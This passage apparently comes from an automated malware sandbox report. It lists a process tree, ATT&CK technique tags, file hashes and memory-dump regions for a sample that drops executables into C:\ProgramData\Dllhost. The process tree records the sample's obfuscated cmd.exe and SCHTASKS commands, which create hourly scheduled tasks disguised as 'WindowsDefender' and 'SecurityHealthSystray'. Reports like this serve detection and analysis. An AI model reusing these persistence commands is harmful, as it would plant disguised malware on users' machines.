C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo мrНаYUдHС & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo SgОCаc2nЕярFЙ1й
3⤵
PID:2112

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1052

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo jРS
3⤵
PID:3016

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
4⤵
- Creates scheduled task(s)
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 148
2⤵
- Program crash
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1712 -ip 1712
1⤵
PID:3456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe
Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe
Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json
Filesize
319B

MD5
c5f8798ae874128f672a5530896be6c8

SHA1
af8ea8134104bd02b44e9ba22cd0aec237274803

SHA256
9f39bae97cbc0a943def6b6b954a57c45e938648b506a3b9196684cdbbb53a78

SHA512
7f01c1aab052614e921974ccfcfacdc15afac8a0660cb89790233480eb9e64a0f0aa6fd3495e20708e54569456a83b8b70716e49fbb20d15d3227c11502f32fa

Download Submit
C:\ProgramData\HostData\logs.uce
Filesize
343B

MD5
761fee773ec1e1eb396eddddeb321865

SHA1
f969e9da9e90a5aef00730b8e1c3763ba2ac46c5

SHA256
82273f8e42cee630011c8e931351186391c4ca9e126e5921db275564e1ef7fbb

SHA512
3f648b7c88b1e0195acad5ad194b59f5de8f2bf9179b2cc330d7ef1a028d48141541545b2354137a2ab0105e92fb75d9e0e11c9250ee1bcb7a4f472de3637a5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
e02f03c016727f2c396c15f9e528b8fa

SHA1
f7ac222a4ad7e6dddd257ad7658e6ed12914b098

SHA256
a0dcced092dba422c2d3c5151407772ae7544072fd6b32c43a669945216dc66f

SHA512
e3470cc0ee22eb737590f66f578127ef448f4b7f17bb80ee76ae184c20ec4b6dd4a29128ccc1347787c7335c4a96b17be40d9e8f0581b5e2ffa21c2c8d827252

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
86da74ec27f447ec3fa950872dc61aab

SHA1
94308a4bcee176a1360537c5dafd187f86f38109

SHA256
b8c0fb6cca972b54abffa3fa7f85108ced02ae2e388d53318c2c4ffc5395d22c

SHA512
f2fb4c8eca4361ae71e062c0cd02433ed3d2b5995b54c8902ae2f134e324b60b9e7faef4cf875fdc7eb136ea542f6dc4354e52fc93df7d9bb44b3c7034014576

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
710a00d53bcb7103077ad715feb00350

SHA1
7a62cfa53079d2226e73e48f2bb5bd487c29c0ef

SHA256
c7e0a45d9510e40e1a80a3f6f735db88858f7f495deaea4bcab40fae23aa9b9f

SHA512
6be148586e00d26dfb012029add3e541b23f6fb2b016fb725c354f646beb7ef13f2b233bc38969b935ef6f1d89b6adb467acee52197fdc27417a8b2ea22ab8a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB

MD5
1b126d259d5ec5ccece7108b5f0ebf19

SHA1
84fd8d665542d7e9076aa78f84f7d95c7d1314de

SHA256
98db843aa29ef169dbec15a4f4669aa4624d70f34be381f54ad3139d77d65189

SHA512
41c781b3faa3ec839d0cb42322df5e9982f9e0b4ca7bccf4615111d22b8ebda4735616450008e3c48e25ab16a78709187dc6e30c4258e7f42ce9638105f956df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
724B

MD5
fd319d54ccdad7699265d93192db8709

SHA1
68cc89f78f6e2d57431e935b5768dd08d9e08f00

SHA256
976a1e9f3fec83f87e2873cf7268f34265c0610c54814f1305399341066c5c56

SHA512
6747801e12cc3bfdad670b2593e7d5a7e65dce70089f1543f0cc89305a897fe47d4e52f8e6830b8dfe7311d1659bb35dcb0336a6c9c973aac0a566a98a8a43e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wcessj4w.mi3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/396-306-0x000000007F4B0000-0x000000007F4C0000-memory.dmp

Filesize
64KB

Download
memory/396-251-0x00000000050E0000-0x00000000050F0000-memory.dmp

Filesize
64KB

Download
memory/396-202-0x00000000050E0000-0x00000000050F0000-memory.dmp

Filesize
64KB

Download
memory/396-253-0x0000000074B50000-0x0000000074B9C000-memory.dmp

Filesize
304KB

Download
memory/1220-252-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

Filesize
64KB

Download
memory/1220-204-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

Filesize
64KB

Download
memory/1220-273-0x0000000074B50000-0x0000000074B9C000-memory.dmp

Filesize
304KB

Download
memory/1220-305-0x0000000002EB0000-0x0000000002EC0000-memory.dmp

Filesize
64KB

Download
memory/1712-293-0x0000000074B50000-0x0000000074B9C000-memory.dmp

Filesize
304KB

Download
memory/1712-203-0x0000000005240000-0x0000000005250000-memory.dmp

Filesize
64KB

Download
memory/1712-308-0x000000007F860000-0x000000007F870000-memory.dmp

Filesize
64KB

Download
memory/1712-307-0x0000000005240000-0x0000000005250000-memory.dmp

Filesize
64KB

Download
memory/1868-142-0x0000000007D90000-0x0000000007DF6000-memory.dmp

Filesize
408KB

Download
memory/1868-159-0x0000000007F10000-0x0000000007F20000-memory.dmp

Filesize
64KB

Download
memory/1868-141-0x0000000007C30000-0x0000000007C3A000-memory.dmp

Filesize
40KB

Download
memory/1868-133-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1868-140-0x0000000007F10000-0x0000000007F20000-memory.dmp

Filesize
64KB

Download
memory/1868-139-0x0000000007C80000-0x0000000007D12000-memory.dmp

Filesize
584KB

Download
memory/1868-138-0x0000000008130000-0x00000000086D4000-memory.dmp

Filesize
5.6MB

Download
memory/2020-199-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2020-304-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2020-198-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2020-274-0x0000000074B50000-0x0000000074B9C000-memory.dmp

Filesize
304KB

Download
memory/2624-194-0x00000000004B0000-0x00000000004C6000-memory.dmp

Filesize
88KB

Download
memory/2624-197-0x0000000007490000-0x00000000074A0000-memory.dmp

Filesize
64KB

Download
memory/2624-318-0x0000000007490000-0x00000000074A0000-memory.dmp

Filesize
64KB

Download
memory/3032-328-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-329-0x0000000001150000-0x0000000001170000-memory.dmp

Filesize
128KB

Download
memory/3032-333-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-332-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-334-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-331-0x0000000001150000-0x0000000001170000-memory.dmp

Filesize
128KB

Download
memory/3032-330-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-324-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/3032-326-0x0000000001110000-0x0000000001150000-memory.dmp

Filesize
256KB

Download
memory/3032-336-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-335-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3032-327-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4480-294-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/4480-200-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/4480-263-0x0000000074B50000-0x0000000074B9C000-memory.dmp

Filesize
304KB

Download
memory/4480-201-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/4552-180-0x0000000007280000-0x0000000007316000-memory.dmp

Filesize
600KB

Download
memory/4552-158-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

Filesize
120KB

Download
memory/4552-148-0x0000000005610000-0x0000000005676000-memory.dmp

Filesize
408KB

Download
memory/4552-147-0x0000000004E30000-0x0000000004E52000-memory.dmp

Filesize
136KB

Download
memory/4552-145-0x00000000048B0000-0x00000000048C0000-memory.dmp

Filesize
64KB

Download
memory/4552-146-0x00000000048B0000-0x00000000048C0000-memory.dmp

Filesize
64KB

Download
memory/4552-160-0x00000000048B0000-0x00000000048C0000-memory.dmp

Filesize
64KB

Download
memory/4552-144-0x0000000004EF0000-0x0000000005518000-memory.dmp

Filesize
6.2MB

Download
memory/4552-161-0x00000000062C0000-0x00000000062F2000-memory.dmp

Filesize
200KB

Download
memory/4552-143-0x0000000004720000-0x0000000004756000-memory.dmp

Filesize
216KB

Download
memory/4552-165-0x0000000074A60000-0x0000000074AAC000-memory.dmp

Filesize
304KB

Download
memory/4552-175-0x00000000062A0000-0x00000000062BE000-memory.dmp

Filesize
120KB

Download
memory/4552-176-0x0000000007640000-0x0000000007CBA000-memory.dmp

Filesize
6.5MB

Download
memory/4552-177-0x0000000006FF0000-0x000000000700A000-memory.dmp

Filesize
104KB

Download
memory/4552-178-0x000000007F720000-0x000000007F730000-memory.dmp

Filesize
64KB

Download
memory/4552-179-0x0000000007070000-0x000000000707A000-memory.dmp

Filesize
40KB

Download
memory/4552-181-0x00000000048B0000-0x00000000048C0000-memory.dmp

Filesize
64KB

Download
memory/4552-182-0x00000000048B0000-0x00000000048C0000-memory.dmp

Filesize
64KB

Download
memory/4552-183-0x0000000007230000-0x000000000723E000-memory.dmp

Filesize
56KB

Download
memory/4552-185-0x0000000007320000-0x000000000733A000-memory.dmp

Filesize
104KB

Download
memory/4552-186-0x0000000007270000-0x0000000007278000-memory.dmp

Filesize
32KB

Download